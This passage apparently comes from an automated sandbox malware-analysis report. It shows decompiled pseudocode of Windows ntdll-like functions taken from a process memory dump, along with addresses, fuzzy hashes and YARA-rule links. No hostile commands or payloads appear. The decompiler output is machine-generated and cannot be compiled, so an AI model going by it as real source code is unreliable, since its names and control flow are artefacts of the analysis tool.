				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01519730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0159A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0159A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E015A1293(_t79, _v40, E015A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E014F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0159138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                        0x015a05c5
                                                                        0x015a05ca
                                                                        0x015a05d3
                                                                        0x015a06db
                                                                        0x015a06db
                                                                        0x015a06dd
                                                                        0x015a06e3
                                                                        0x015a06e3
                                                                        0x015a05dd
                                                                        0x015a05e7
                                                                        0x015a05f6
                                                                        0x015a0600
                                                                        0x015a0607
                                                                        0x015a0610
                                                                        0x015a0615
                                                                        0x015a061a
                                                                        0x015a061c
                                                                        0x015a061e
                                                                        0x015a0624
                                                                        0x015a0625
                                                                        0x015a0627
                                                                        0x015a0628
                                                                        0x015a0631
                                                                        0x015a0640
                                                                        0x015a064d
                                                                        0x015a0654
                                                                        0x015a0654
                                                                        0x015a0631
                                                                        0x015a066d
                                                                        0x015a0674
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015a0692
                                                                        0x015a069e
                                                                        0x015a06b0
                                                                        0x015a06a0
                                                                        0x015a06a9
                                                                        0x015a06a9
                                                                        0x015a06b8
                                                                        0x015a06d6
                                                                        0x015a06d6
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction ID: ce6ec432aeac0f4a9b41bd1bab38f2855ca4375f6d5396730793753dafd4e02a
                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction Fuzzy Hash: 18310E32640716ABE720DE28CD84F9E7BD9BBC4758F144229FA489F2C0D670E905CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01553884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E01553884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01519650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L014F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01519650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                        0x01553893
                                                                        0x01553896
                                                                        0x01553899
                                                                        0x0155389f
                                                                        0x015538a0
                                                                        0x015538a4
                                                                        0x015538a9
                                                                        0x015538ac
                                                                        0x015538ad
                                                                        0x015538ae
                                                                        0x015538af
                                                                        0x015538b1
                                                                        0x015538b4
                                                                        0x015538bb
                                                                        0x015538bc
                                                                        0x015538bd
                                                                        0x015538c4
                                                                        0x015538c8
                                                                        0x015538ca
                                                                        0x015538ca
                                                                        0x015538d5
                                                                        0x0155393e
                                                                        0x01553940
                                                                        0x01553942
                                                                        0x01553952
                                                                        0x01553954
                                                                        0x01553961
                                                                        0x01553961
                                                                        0x01553967
                                                                        0x0155396e
                                                                        0x0155396e
                                                                        0x01553947
                                                                        0x0155394c
                                                                        0x00000000
                                                                        0x0155394c
                                                                        0x015538ea
                                                                        0x015538ee
                                                                        0x015538f8
                                                                        0x015538f9
                                                                        0x015538ff
                                                                        0x01553900
                                                                        0x01553902
                                                                        0x01553903
                                                                        0x0155390b
                                                                        0x0155390f
                                                                        0x01553950
                                                                        0x00000000
                                                                        0x01553950
                                                                        0x01553915
                                                                        0x0155391d
                                                                        0x0155391d
                                                                        0x01553922
                                                                        0x01553926
                                                                        0x00000000
                                                                        0x01553928
                                                                        0x0155392b
                                                                        0x0155392b
                                                                        0x01553935
                                                                        0x01553937
                                                                        0x01553937
                                                                        0x00000000
                                                                        0x01553935
                                                                        0x01553926
                                                                        0x015538f0
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: 8e0255805761fba50bc9c0f043a8f9c40ba95cddd3f72371536b2b457a805924
                                                                        • Instruction ID: e1ac0b2867d0565a4095fad223b9b0b238b215d6f0bb30f404735834bdc4f6fd
                                                                        • Opcode Fuzzy Hash: 8e0255805761fba50bc9c0f043a8f9c40ba95cddd3f72371536b2b457a805924
                                                                        • Instruction Fuzzy Hash: DE31E5B290151AAFEB95DE59C965D6FFBB4FF80B60F01416AED18AB250D7309E00C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0150D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 33%
                                                                        			E0150D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x15cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E014F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0151B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E015198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E015195D0();
					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                        0x0150d29c
                                                                        0x0150d2a6
                                                                        0x0150d2b1
                                                                        0x0150d2b5
                                                                        0x0150d2b6
                                                                        0x0150d2bc
                                                                        0x0150d2bd
                                                                        0x0150d2be
                                                                        0x0150d2bf
                                                                        0x0150d2c2
                                                                        0x0150d2c4
                                                                        0x0150d2cc
                                                                        0x0150d384
                                                                        0x0150d34b
                                                                        0x0150d34f
                                                                        0x0150d350
                                                                        0x0150d351
                                                                        0x0150d35c
                                                                        0x0150d35c
                                                                        0x0150d2d6
                                                                        0x0150d2da
                                                                        0x0150d2e1
                                                                        0x0150d361
                                                                        0x0150d369
                                                                        0x0150d36d
                                                                        0x0150d2e3
                                                                        0x0150d2e3
                                                                        0x0150d2e3
                                                                        0x0150d2e5
                                                                        0x0150d2ed
                                                                        0x0150d2f5
                                                                        0x0150d2fa
                                                                        0x0150d302
                                                                        0x0150d303
                                                                        0x0150d30b
                                                                        0x0150d30f
                                                                        0x0150d313
                                                                        0x0150d318
                                                                        0x0150d31c
                                                                        0x0150d320
                                                                        0x0150d379
                                                                        0x0150d37d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0154affe
                                                                        0x0154b001
                                                                        0x0154b011
                                                                        0x00000000
                                                                        0x0150d322
                                                                        0x0150d322
                                                                        0x0150d330
                                                                        0x0150d337
                                                                        0x0150d35d
                                                                        0x0150d339
                                                                        0x0150d33f
                                                                        0x0150d38c
                                                                        0x0150d38c
                                                                        0x0150d33f
                                                                        0x0150d349
                                                                        0x00000000
                                                                        0x0150d349

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: ea7222e29f9242ef361af52f441ced161f99fa01f5835f8bee2512032076cbe9
                                                                        • Instruction ID: 991d5a2a5e92e00f6ee4f2daa71da9fe9dbe221670d1579f371a67f7a193e10f
                                                                        • Opcode Fuzzy Hash: ea7222e29f9242ef361af52f441ced161f99fa01f5835f8bee2512032076cbe9
                                                                        • Instruction Fuzzy Hash: A9318FB55083069FD312DFE8C9809AFBBF8FB95654F00092EF9958B290D634DD04CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E014E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0151BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0151A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0151A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L014F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                        0x014e1b8f
                                                                        0x014e1b9a
                                                                        0x014e1b9c
                                                                        0x014e1b9e
                                                                        0x014e1ba3
                                                                        0x01537010
                                                                        0x01537010
                                                                        0x00000000
                                                                        0x014e1ba9
                                                                        0x014e1ba9
                                                                        0x014e1bae
                                                                        0x00000000
                                                                        0x014e1bc5
                                                                        0x014e1bca
                                                                        0x014e1bcf
                                                                        0x014e1bd0
                                                                        0x014e1bd1
                                                                        0x014e1bd2
                                                                        0x014e1bd6
                                                                        0x014e1bdc
                                                                        0x014e1be0
                                                                        0x01536ffc
                                                                        0x01537000
                                                                        0x00000000
                                                                        0x01537006
                                                                        0x01537009
                                                                        0x01537009
                                                                        0x014e1be6
                                                                        0x014e1bec
                                                                        0x014e1c0b
                                                                        0x014e1c0b
                                                                        0x014e1c0c
                                                                        0x014e1c11
                                                                        0x014e1c12
                                                                        0x014e1c15
                                                                        0x014e1c1b
                                                                        0x014e1c1f
                                                                        0x014e1c31
                                                                        0x014e1c33
                                                                        0x01537026
                                                                        0x01537026
                                                                        0x014e1c21
                                                                        0x014e1c24
                                                                        0x014e1c24
                                                                        0x014e1bee
                                                                        0x014e1bee
                                                                        0x014e1bf2
                                                                        0x014e1c3a
                                                                        0x014e1bf4
                                                                        0x014e1bf4
                                                                        0x014e1c05
                                                                        0x014e1c05
                                                                        0x014e1c09
                                                                        0x014e1c3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014e1c09
                                                                        0x014e1bec
                                                                        0x014e1be0
                                                                        0x014e1bae
                                                                        0x014e1c2e

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WindowsExcludedProcs
                                                                        • API String ID: 0-3583428290
                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction ID: 3f4210f4da820a37baade45f814012b802e79b1b73c6fe87b6f78db4d9d5b71d
                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction Fuzzy Hash: 8421287A941519ABEB329A598944F6FBBEDFF84A51F050466FA04CF210D630DD11CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014FF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E014FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                        0x014ff71d
                                                                        0x014ff722
                                                                        0x014ff726
                                                                        0x01544770
                                                                        0x014ff765
                                                                        0x014ff769
                                                                        0x014ff769
                                                                        0x014ff732
                                                                        0x0154477a
                                                                        0x00000000
                                                                        0x0154477a
                                                                        0x014ff738
                                                                        0x014ff73a
                                                                        0x014ff73c
                                                                        0x014ff73f
                                                                        0x014ff746
                                                                        0x014ff778
                                                                        0x014ff7a9
                                                                        0x014ff7a9
                                                                        0x014ff754
                                                                        0x014ff75a
                                                                        0x014ff75d
                                                                        0x014ff75f
                                                                        0x014ff761
                                                                        0x014ff76f
                                                                        0x014ff771
                                                                        0x014ff771
                                                                        0x014ff76f
                                                                        0x014ff763
                                                                        0x00000000
                                                                        0x014ff763
                                                                        0x014ff77d
                                                                        0x014ff7a3
                                                                        0x014ff7a5
                                                                        0x00000000
                                                                        0x014ff7a5
                                                                        0x014ff77f
                                                                        0x014ff782
                                                                        0x014ff784
                                                                        0x014ff786
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014ff788
                                                                        0x014ff748
                                                                        0x014ff74d
                                                                        0x014ff78d
                                                                        0x014ff793
                                                                        0x014ff7b7
                                                                        0x014ff7bc
                                                                        0x00000000
                                                                        0x014ff7bc
                                                                        0x014ff798
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014ff79d
                                                                        0x014ff7b0
                                                                        0x00000000
                                                                        0x014ff7b0
                                                                        0x014ff79f
                                                                        0x00000000
                                                                        0x014ff74f
                                                                        0x014ff74f
                                                                        0x00000000
                                                                        0x014ff74f

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: b476e098644264e9ddd7ab25c0bf2d464a81ad77f83a5ce4e0f6ead38cf0b9b6
                                                                        • Instruction ID: e6f195d14102da669731bcbf292e5ee680c4373d4f7b1d4a08bd40a237fd031f
                                                                        • Opcode Fuzzy Hash: b476e098644264e9ddd7ab25c0bf2d464a81ad77f83a5ce4e0f6ead38cf0b9b6
                                                                        • Instruction Fuzzy Hash: 7011B23B3046428BEB254E1D8490737F6D5AB85624F28452FE761DB3B1DB70D84A8341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01588DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E01588DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x15b0d50);
				E0152D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01565720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0152DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0152DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0152D130(_t34, _t39, _t40);
			}





                                                                        0x01588df1
                                                                        0x01588df1
                                                                        0x01588df1
                                                                        0x01588df1
                                                                        0x01588df1
                                                                        0x01588df1
                                                                        0x01588df3
                                                                        0x01588df8
                                                                        0x01588dfd
                                                                        0x01588e00
                                                                        0x01588e0e
                                                                        0x01588e2a
                                                                        0x01588e36
                                                                        0x01588e38
                                                                        0x01588e3c
                                                                        0x01588e46
                                                                        0x01588e46
                                                                        0x01588e36
                                                                        0x01588e50
                                                                        0x01588e56
                                                                        0x01588e59
                                                                        0x01588e5c
                                                                        0x01588e60
                                                                        0x01588e67
                                                                        0x01588e6d
                                                                        0x01588e73
                                                                        0x01588e74
                                                                        0x01588eb1
                                                                        0x01588ebd

                                                                        Strings
                                                                        • Critical error detected %lx, xrefs: 01588E21
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Critical error detected %lx
                                                                        • API String ID: 0-802127002
                                                                        • Opcode ID: 68406f9a085415b29e089c55c4302a50ded78de32ca1799bc4b9304f28250df9
                                                                        • Instruction ID: 3f6d497f6b9e062edfe97fb29905e27f2ec1e182e459317ca2963a38779f8ead
                                                                        • Opcode Fuzzy Hash: 68406f9a085415b29e089c55c4302a50ded78de32ca1799bc4b9304f28250df9
                                                                        • Instruction Fuzzy Hash: BF114272D10349DEDB28DFA8850579CBBB0BB55310F20426EE568AF2D2C3340602CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0156FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0156FF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                        • API String ID: 0-1911121157
                                                                        • Opcode ID: dd1f0a37d9878191992ed58028afe19ecf928452116c1515e62ad1ec4e94c51f
                                                                        • Instruction ID: a94acbd10f73f5794c78024e8e1fc2228dc0f501a9976664e174a9e981a32f7a
                                                                        • Opcode Fuzzy Hash: dd1f0a37d9878191992ed58028afe19ecf928452116c1515e62ad1ec4e94c51f
                                                                        • Instruction Fuzzy Hash: 0F110072910185EFEB26EF94C849F9CBBB1FF49B04F248048E5086F6A1C7399940DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015A5BA5, Relevance: .6, Instructions: 592COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17ba4cba3e072ae0f4cb1c22605bd46f72c7ea723324a9651a28d4fb93717af3
                                                                        • Instruction ID: 153b95e6c54d2471a1983ea52e81b7c9c36ffac669645878727c3bb62c9b6142
                                                                        • Opcode Fuzzy Hash: 17ba4cba3e072ae0f4cb1c22605bd46f72c7ea723324a9651a28d4fb93717af3
                                                                        • Instruction Fuzzy Hash: 8D426A75950229CFDB20CF68C880BADBBF1FF45304F5981AAD95DAB242E7309A85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014F4120, Relevance: .4, Instructions: 444COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 148e7fdef3ae6466c9fc20d5dceeac663c831b2df479aded4ac15b8274354c83
                                                                        • Instruction ID: 94111b48208b59669b76a384bc1bc7de7ed91e23fb080373caf7dce5c8360270
                                                                        • Opcode Fuzzy Hash: 148e7fdef3ae6466c9fc20d5dceeac663c831b2df479aded4ac15b8274354c83
                                                                        • Instruction Fuzzy Hash: 94F17A746082118BD724CF59C481A7BB7E1FF98754F09492EF686CB3A1EB34D886CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015020A0, Relevance: .4, Instructions: 420COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b14d38f2cfc25002c2925af386b89b35502050834d3b60f0185f5d6ff5076dd
                                                                        • Instruction ID: 9ba502e68fe2682ef4f5d706cd10f3e729a68c4563f8442f630a4e9933fbf348
                                                                        • Opcode Fuzzy Hash: 6b14d38f2cfc25002c2925af386b89b35502050834d3b60f0185f5d6ff5076dd
                                                                        • Instruction Fuzzy Hash: ECF1D0356083429FEB27CFA8C44476E7BE1BB95728F08891DE9958F281E774D845CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014ED5E0, Relevance: .4, Instructions: 353COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 554a716109fd9d65ebd0c2b24163ef179955fe87ca1d56361b4b366c54554d2f
                                                                        • Instruction ID: 4cf289a60c3d349afa3c616885798905c75af49575dab7d11eba0e90057a27ca
                                                                        • Opcode Fuzzy Hash: 554a716109fd9d65ebd0c2b24163ef179955fe87ca1d56361b4b366c54554d2f
                                                                        • Instruction Fuzzy Hash: B9E1C134E0075A8FEB35CF68C888B6AB7F2BF85305F05019AD9199B3A1D734A985CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014E849B, Relevance: .3, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49633816037948054e3bab46b0ab1233d54ff52b3081f15e17fa440203796e1e
                                                                        • Instruction ID: 822d4cb4d59edb9fc61af09fa684593c03b44c91392999e1e3864cab74f9ee0d
                                                                        • Opcode Fuzzy Hash: 49633816037948054e3bab46b0ab1233d54ff52b3081f15e17fa440203796e1e
                                                                        • Instruction Fuzzy Hash: D3B159B0E0020ADFDF15CFA9C984AADBBF5BF98304F10412AE515AB355D770A946CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0150513A, Relevance: .3, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b397f2d9472e5f038fead1eb41e2aa2f9899abbee16e45102b367bc68e20acde
                                                                        • Instruction ID: 29eaaf0c30a62fb01c91e3f8473e7578877319e9f96a24d949dbe9c7ad620dc3
                                                                        • Opcode Fuzzy Hash: b397f2d9472e5f038fead1eb41e2aa2f9899abbee16e45102b367bc68e20acde
